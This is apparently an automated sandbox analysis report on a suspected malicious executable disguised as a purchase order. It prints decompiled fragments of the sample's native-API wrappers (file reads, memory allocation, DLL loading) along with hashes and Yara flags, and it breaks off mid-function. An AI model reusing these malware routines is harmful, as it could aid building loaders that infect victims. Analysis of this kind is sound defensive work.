                                                                          • Opcode ID: 71d54fd617051ae10a0efd5fb676e99b88ad982ab30111e32d62e72c60997139
                                                                          • Instruction ID: bf2803f9c79ed032609e809334cdae9d0115be855b1a190d15f5d34bc74c1d81
                                                                          • Opcode Fuzzy Hash: 71d54fd617051ae10a0efd5fb676e99b88ad982ab30111e32d62e72c60997139
                                                                          • Instruction Fuzzy Hash: E3014B37800209DFDF35AF7CE4846AEBBB6AF24219F98442DD0445A291CB31E584CB01
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Analysis Process: Purchase Order 40,7045$.exe PID: 4392 Parent PID: 5468 Purchase Order 40,7045$.exeCOMMON

                                                                          Executed Functions

                                                                          Function 00417C4C, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38filenativeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • NtReadFile.NTDLL(B7A,5EB6D251,FFFFFFFF,00413401,?,?,B7A,?,00413401,FFFFFFFF,5EB6D251,00413742,?,00000000), ref: 00417C95
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FileRead
                                                                          • String ID: B7A$B7A
                                                                          • API String ID: 2738559852-4286991671
                                                                          • Opcode ID: a4c96e6fff6b813746d68099e86f7705dc423357b60c7f8202f5c84675e3ca42
                                                                          • Instruction ID: a0d3cf1b970ca4c606686759a31231282fdb88ea223be133041269946715ec58
                                                                          • Opcode Fuzzy Hash: a4c96e6fff6b813746d68099e86f7705dc423357b60c7f8202f5c84675e3ca42
                                                                          • Instruction Fuzzy Hash: B0F0F9B6210108ABCB04DF89DC81EEB77AAAF8C714F158248BE1D97241C634E8158BA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00417C50, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36filenativeCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 37%
                                                                          			E00417C50(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E004187A0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x413742
				_t12 =  &_a8; // 0x413742
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
				return _t18;
			}






                                                                          0x00417c53
                                                                          0x00417c5f
                                                                          0x00417c67
                                                                          0x00417c72
                                                                          0x00417c8d
                                                                          0x00417c95
                                                                          0x00417c99

                                                                          APIs
                                                                          • NtReadFile.NTDLL(B7A,5EB6D251,FFFFFFFF,00413401,?,?,B7A,?,00413401,FFFFFFFF,5EB6D251,00413742,?,00000000), ref: 00417C95
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FileRead
                                                                          • String ID: B7A$B7A
                                                                          • API String ID: 2738559852-4286991671
                                                                          • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                          • Instruction ID: fc5ad5632067f05b263ccb687f6d3dc243eec14252959ded3e13faba14aac604
                                                                          • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                          • Instruction Fuzzy Hash: A6F0B7B6210208AFCB14DF89DC81EEB77ADEF8C754F158649BE1D97241DA30E851CBA4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00409900, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 93%
                                                                          			E00409900(void* __ebx, void* __ecx, void* __edx, void* _a4) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t31;
				void* _t32;
				void* _t33;
				void* _t34;

				 *((intOrPtr*)(__ebx - 0x72aef3b3)) =  *((intOrPtr*)(__ebx - 0x72aef3b3)) + __ecx;
				asm("clc");
				_v8 =  &_v536;
				_t15 = E0041A500(__edx, 0x104, _t31);
				_t33 = _t32 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041A920(__eflags, _v8);
					_t34 = _t33 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041ABA0( &_v12, 0);
						_t34 = _t34 + 8;
					}
					_t18 = E00418CE0(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}














                                                                          0x00409908
                                                                          0x0040990f
                                                                          0x0040991c
                                                                          0x0040991f
                                                                          0x00409924
                                                                          0x00409929
                                                                          0x00409933
                                                                          0x00409938
                                                                          0x0040993b
                                                                          0x0040993d
                                                                          0x00409945
                                                                          0x0040994a
                                                                          0x0040994a
                                                                          0x00409951
                                                                          0x00409959
                                                                          0x0040995c
                                                                          0x0040995e
                                                                          0x00409972
                                                                          0x00000000
                                                                          0x00409974
                                                                          0x0040997a
                                                                          0x0040992e
                                                                          0x0040992e
                                                                          0x0040992e

                                                                          APIs
                                                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409972
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Load
                                                                          • String ID:
                                                                          • API String ID: 2234796835-0
                                                                          • Opcode ID: 37f4746ef459d9f07f06715d19472fa1fcea844b9e4b44dfac876fc9659aa77f
                                                                          • Instruction ID: 3e1a9c836465f0cd9433f245acf6ec4b9b71b65f2e46e3002b83b2b59f828c46
                                                                          • Opcode Fuzzy Hash: 37f4746ef459d9f07f06715d19472fa1fcea844b9e4b44dfac876fc9659aa77f
                                                                          • Instruction Fuzzy Hash: 5C0112B5D0010DB7DF10DAE5DC42FDEB7799B54318F0041AAA908A7281F635EB54C795
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00417BA0, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E00417BA0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E004187A0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





                                                                          0x00417baf
                                                                          0x00417bb7
                                                                          0x00417bed
                                                                          0x00417bf1

                                                                          APIs
                                                                          • NtCreateFile.NTDLL(00000060,004088D3,?,00413587,004088D3,FFFFFFFF,?,?,FFFFFFFF,004088D3,00413587,?,004088D3,00000060,00000000,00000000), ref: 00417BED
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateFile
                                                                          • String ID:
                                                                          • API String ID: 823142352-0
                                                                          • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                          • Instruction ID: 4afee6fb9e531a923c37445cfbca9961fe51888352856234bfa29487f9728496
                                                                          • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                          • Instruction Fuzzy Hash: 93F0B2B6210208ABCB08CF89DC85EEB77ADAF8C754F158248BA1D97241C630E8518BA4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00417D80, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E00417D80(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E004187A0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                                                                          0x00417d8f
                                                                          0x00417d97
                                                                          0x00417db9
                                                                          0x00417dbd

                                                                          APIs
                                                                          • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418974,?,00000000,?,00003000,00000040,00000000,00000000,004088D3), ref: 00417DB9
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AllocateMemoryVirtual
                                                                          • String ID:
                                                                          • API String ID: 2167126740-0
                                                                          • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                          • Instruction ID: 32094056e276ca4c351f563d3a1a8b286601cfb6b388fbac89c968cca0640338
                                                                          • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                          • Instruction Fuzzy Hash: 23F015B6210208ABCB14DF89CC81EEB77ADAF88754F158549BE1897241C630F810CBA4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00417CCA, Relevance: 1.5, APIs: 1, Instructions: 21nativeCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 82%
                                                                          			E00417CCA(void* __eax, intOrPtr _a4, void* _a8) {
				long _t10;
				void* _t13;

				asm("out 0x62, al");
				_t7 = _a4;
				_t2 = _t7 + 0x10; // 0x300
				_t3 = _t7 + 0xc50; // 0x409523
				E004187A0(_t13, _a4, _t3,  *_t2, 0, 0x2c);
				_t10 = NtClose(_a8); // executed
				return _t10;
			}





                                                                          0x00417cca
                                                                          0x00417cd3
                                                                          0x00417cd6
                                                                          0x00417cdf
                                                                          0x00417ce7
                                                                          0x00417cf5
                                                                          0x00417cf9

                                                                          APIs
                                                                          • NtClose.NTDLL(00413720,?,?,00413720,004088D3,FFFFFFFF), ref: 00417CF5
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Close
                                                                          • String ID:
                                                                          • API String ID: 3535843008-0
                                                                          • Opcode ID: 4dee57b317ebfe0f17001f1b3ef6753f6ac6057a1ec74bb3bf5305d24e139ee7
                                                                          • Instruction ID: c1654642e2f967172a1c53268c804fbf90d71c03da804563078781cd8180cfec
                                                                          • Opcode Fuzzy Hash: 4dee57b317ebfe0f17001f1b3ef6753f6ac6057a1ec74bb3bf5305d24e139ee7
                                                                          • Instruction Fuzzy Hash: E6E0C236200200BBD710EBD4CC45FD777A8EF44B10F144859BE1C9B282C530E6008BE0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00417CD0, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E00417CD0(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409523
				E004187A0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}





                                                                          0x00417cd3
                                                                          0x00417cd6
                                                                          0x00417cdf
                                                                          0x00417ce7
                                                                          0x00417cf5
                                                                          0x00417cf9

                                                                          APIs
                                                                          • NtClose.NTDLL(00413720,?,?,00413720,004088D3,FFFFFFFF), ref: 00417CF5
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Close
                                                                          • String ID:
                                                                          • API String ID: 3535843008-0
                                                                          • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                          • Instruction ID: ae2cc5cd469da51146004d318edbe4db161d7590eeb0e760de4222944ae99cbc
                                                                          • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                          • Instruction Fuzzy Hash: 91D01275200214ABD710EB99CC45ED7775DEF44750F154459BA1C5B242C530F50086E0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00FC98F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.273918158.0000000000F60000.00000040.00000001.sdmp, Offset: 00F60000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 07c1f9fc2afe09b53e4331451e54bca0b2cabf13ceeb205a14d96132bdb706f4
                                                                          • Instruction ID: 621530fac9804fe0c8ab82130b8106e0543c66c0aada70b37501331fa14c4033
                                                                          • Opcode Fuzzy Hash: 07c1f9fc2afe09b53e4331451e54bca0b2cabf13ceeb205a14d96132bdb706f4
                                                                          • Instruction Fuzzy Hash: 9190026165100502D20171594404616100B97D0381F95C033A1015565FCA668992F171
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00FC9860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.273918158.0000000000F60000.00000040.00000001.sdmp, Offset: 00F60000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 792e734a5425ee2f32ef2c0c1dc9221716baa7c67324eeb0a09f2baa3f292605
                                                                          • Instruction ID: 555e251fe6ecc85463047b4c7ba7c4edead97e12fba930115072dc6d6703768d
                                                                          • Opcode Fuzzy Hash: 792e734a5425ee2f32ef2c0c1dc9221716baa7c67324eeb0a09f2baa3f292605
                                                                          • Instruction Fuzzy Hash: EF90027125100413D21161594504707100A97D0381F95C423A0415568E96978952F161
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00FC9840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.273918158.0000000000F60000.00000040.00000001.sdmp, Offset: 00F60000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 07f7bb2ddb06b225e96975d75615b7f34aea59e82727d20ad3513f534a099700
                                                                          • Instruction ID: 2c532708f5deff35293726b117921667d6a2b59482b460a532c2bf68f9b3f662
                                                                          • Opcode Fuzzy Hash: 07f7bb2ddb06b225e96975d75615b7f34aea59e82727d20ad3513f534a099700
                                                                          • Instruction Fuzzy Hash: 83900261292041525645B15944045075007A7E0381B95C023A1405960D85679856F661
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00FC99A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.273918158.0000000000F60000.00000040.00000001.sdmp, Offset: 00F60000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 86bb4e01625811623c2fa57e7208dafa3e07902f0b18c8af8d87d9e47cc92fb3
                                                                          • Instruction ID: c8cbc19dcd25672924c37a0302a69139dd079c55fdc7fb8914f2bfe065124296
                                                                          • Opcode Fuzzy Hash: 86bb4e01625811623c2fa57e7208dafa3e07902f0b18c8af8d87d9e47cc92fb3
                                                                          • Instruction Fuzzy Hash: 4F9002A139100442D20061594414B061006D7E1341F55C026E1055564E865ACC52B166
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00FC9910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.273918158.0000000000F60000.00000040.00000001.sdmp, Offset: 00F60000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: b4b275ff49751d03615de98d0a6dfb8f01f1e40763c11fd65d47ab2ea5b1b5fe
                                                                          • Instruction ID: c58721a814de48f752f42f8303835c50a171fd3a3c0bf1d64f1020f9aa169de5
                                                                          • Opcode Fuzzy Hash: b4b275ff49751d03615de98d0a6dfb8f01f1e40763c11fd65d47ab2ea5b1b5fe
                                                                          • Instruction Fuzzy Hash: 5B9002B125100402D24071594404746100697D0341F55C022A5055564F869A8DD5B6A5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00FC9A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.273918158.0000000000F60000.00000040.00000001.sdmp, Offset: 00F60000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 764c151bf5487f6a7efec8258fbb80a3800104a3d2adbccd17a2997f761d8ac6
                                                                          • Instruction ID: 2b3d07d5b0644578dd525f61592ac1dac13270c105dffaefc9a16e915aa4783f
                                                                          • Opcode Fuzzy Hash: 764c151bf5487f6a7efec8258fbb80a3800104a3d2adbccd17a2997f761d8ac6
                                                                          • Instruction Fuzzy Hash: F990026126180042D30065694C14B07100697D0343F55C126A0145564DC9568861B561
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00FC9A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.273918158.0000000000F60000.00000040.00000001.sdmp, Offset: 00F60000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 84d3f83ac988a0c3b2fcf99242d4b2445868568eaa4ee2550641cd7fa06371e6
                                                                          • Instruction ID: d0595fd627bd530479c803f44054d8401e3472c5155e389841ff1088585b7fe6
                                                                          • Opcode Fuzzy Hash: 84d3f83ac988a0c3b2fcf99242d4b2445868568eaa4ee2550641cd7fa06371e6
                                                                          • Instruction Fuzzy Hash: BE900261651000424240716988449065006BBE1351B55C132A0989560E859A8865B6A5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00FC9A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.273918158.0000000000F60000.00000040.00000001.sdmp, Offset: 00F60000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 5572125fa864992d8e43f3dabde1ffee44dc9484d9e0408029129877b74bbe78
                                                                          • Instruction ID: f9755a5da780ff03d3c34801e9cd9a4fa2c7e9db816c6952a9f353bf1807e49b
                                                                          • Opcode Fuzzy Hash: 5572125fa864992d8e43f3dabde1ffee44dc9484d9e0408029129877b74bbe78
                                                                          • Instruction Fuzzy Hash: 5E90027125140402D2006159481470B100697D0342F55C022A1155565E86668851B5B1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00FC95D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.273918158.0000000000F60000.00000040.00000001.sdmp, Offset: 00F60000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 00541a7726c91ef1c7c224c0928549076326be45b50aacd0f859025b1a237d72
                                                                          • Instruction ID: 9ba3d710b518e9dd497f3f9aee077a2bc9ff19f26b996b71e19b2f30ab79e580
                                                                          • Opcode Fuzzy Hash: 00541a7726c91ef1c7c224c0928549076326be45b50aacd0f859025b1a237d72
                                                                          • Instruction Fuzzy Hash: 7D9002A125200003420571594414616500B97E0341F55C032E10055A0EC5668891B165
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00FC9540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.273918158.0000000000F60000.00000040.00000001.sdmp, Offset: 00F60000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: b6c69ec9e559f3db3f4696b3725e6796a55bd7fd6b8de8f2aa1388a522f18fec
                                                                          • Instruction ID: 4ab3c48e6f269c0d26dce86c447a8a3e13bdbc761a5886fa3d4245dd5de7ec23
                                                                          • Opcode Fuzzy Hash: b6c69ec9e559f3db3f4696b3725e6796a55bd7fd6b8de8f2aa1388a522f18fec
                                                                          • Instruction Fuzzy Hash: 80900265261000030205A5590704507104797D5391755C032F1006560DD6628861B161
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00FC96E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.273918158.0000000000F60000.00000040.00000001.sdmp, Offset: 00F60000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: dc9d43037e8093ead719f1e4c05e24be56cf8bcc6120465fc03efc45ac352572
                                                                          • Instruction ID: 6537373e8e0de865d454e32312a4f2086aa108a305e531f07b86ac9599b5c6d7
                                                                          • Opcode Fuzzy Hash: dc9d43037e8093ead719f1e4c05e24be56cf8bcc6120465fc03efc45ac352572
                                                                          • Instruction Fuzzy Hash: 5D90027125108802D2106159840474A100697D0341F59C422A4415668E86D68891B161
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00FC9660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.273918158.0000000000F60000.00000040.00000001.sdmp, Offset: 00F60000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 6018610e255075109a3c2728de36a320768a88073cb8c9c71b811718b2046d1e
                                                                          • Instruction ID: 57a229a2ba404f9e0068b6a25ae428b840f6df7b33617a6a42ed627201ae04f7
                                                                          • Opcode Fuzzy Hash: 6018610e255075109a3c2728de36a320768a88073cb8c9c71b811718b2046d1e
                                                                          • Instruction Fuzzy Hash: 5F90027125100802D2807159440464A100697D1341F95C026A0016664ECA568A59B7E1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00FC9FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.273918158.0000000000F60000.00000040.00000001.sdmp, Offset: 00F60000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: d702349af66f02cda9083bfcd963166b061c5a252f0d6d48b362adcfb6e268bb
                                                                          • Instruction ID: ffdded61fbdc7821af02ec099cef3f491958dfd27e633c3ab55d9884d559a606
                                                                          • Opcode Fuzzy Hash: d702349af66f02cda9083bfcd963166b061c5a252f0d6d48b362adcfb6e268bb
                                                                          • Instruction Fuzzy Hash: 8C90027136114402D21061598404706100697D1341F55C422A0815568E86D68891B162
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00FC97A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.273918158.0000000000F60000.00000040.00000001.sdmp, Offset: 00F60000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 9c73822d25664b22e449143b451c3b4e619d38de55e6bfaab327b31fa1cf6bec
                                                                          • Instruction ID: 1569fc58bc724dae86a8df7f6643992a1b9d4d6be823294089c0b4a0ecd3efbd
                                                                          • Opcode Fuzzy Hash: 9c73822d25664b22e449143b451c3b4e619d38de55e6bfaab327b31fa1cf6bec
                                                                          • Instruction Fuzzy Hash: 1E90026135100003D240715954186065006E7E1341F55D022E0405564DD9568856B262
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00FC9780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.273918158.0000000000F60000.00000040.00000001.sdmp, Offset: 00F60000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 82d02c47defebbac1e7a0b053ce62c8e4e6a766dcff52949f24b6ccda66c23cd
                                                                          • Instruction ID: d09904c82f85ed099912b4ecb38c65d420b81747deea4e2088c2ce898110ab57
                                                                          • Opcode Fuzzy Hash: 82d02c47defebbac1e7a0b053ce62c8e4e6a766dcff52949f24b6ccda66c23cd
                                                                          • Instruction Fuzzy Hash: 7890026926300002D2807159540860A100697D1342F95D426A0006568DC9568869B361
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00FC9710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.273918158.0000000000F60000.00000040.00000001.sdmp, Offset: 00F60000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: efdbd9ad70125bc6495f40ac4b6e3d5c71570f8ff3f7f2c54d81d30abb7662ce
                                                                          • Instruction ID: 9d1b1be469bcea79dbc4e740d9b3b98c006bad06feb1320a619e6d0d227ce18e
                                                                          • Opcode Fuzzy Hash: efdbd9ad70125bc6495f40ac4b6e3d5c71570f8ff3f7f2c54d81d30abb7662ce
                                                                          • Instruction Fuzzy Hash: 4590027125100402D20065995408646100697E0341F55D022A5015565FC6A68891B171
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004086A0, Relevance: .1, Instructions: 92COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 66%
                                                                          			E004086A0(intOrPtr* _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* _t24;
				void* _t30;
				intOrPtr* _t31;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t50;
				intOrPtr* _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;
				void* _t57;

				_t52 = _a4;
				_t39 = 0; // executed
				_t24 = E00406A50(_t52,  &_v24); // executed
				_t54 = _t53 + 8;
				if(_t24 != 0) {
					E00406C60( &_v24,  &_v840);
					_t55 = _t54 + 8;
					do {
						E00419680( &_v284, 0x104);
						E00419CF0( &_v284,  &_v804);
						_t56 = _t55 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_t30 = E00413760(_t52, _t50);
							_t57 = _t56 + 8;
							_t31 = E004137C0(_t30,  &_v284);
							 *_t31 =  *_t31 + _t31;
							_t56 = _t57 + 8;
							if(_t31 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							goto L9;
						}
						_t9 = _t52 + 0x14; // 0xffffe015
						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
						_t39 = 1;
						L9:
						_push( &_v840);
						_push( &_v24);
						_t33 = E00406C90();
						_t55 = _t56 + 8;
					} while (_t33 != 0 && _t39 == 0);
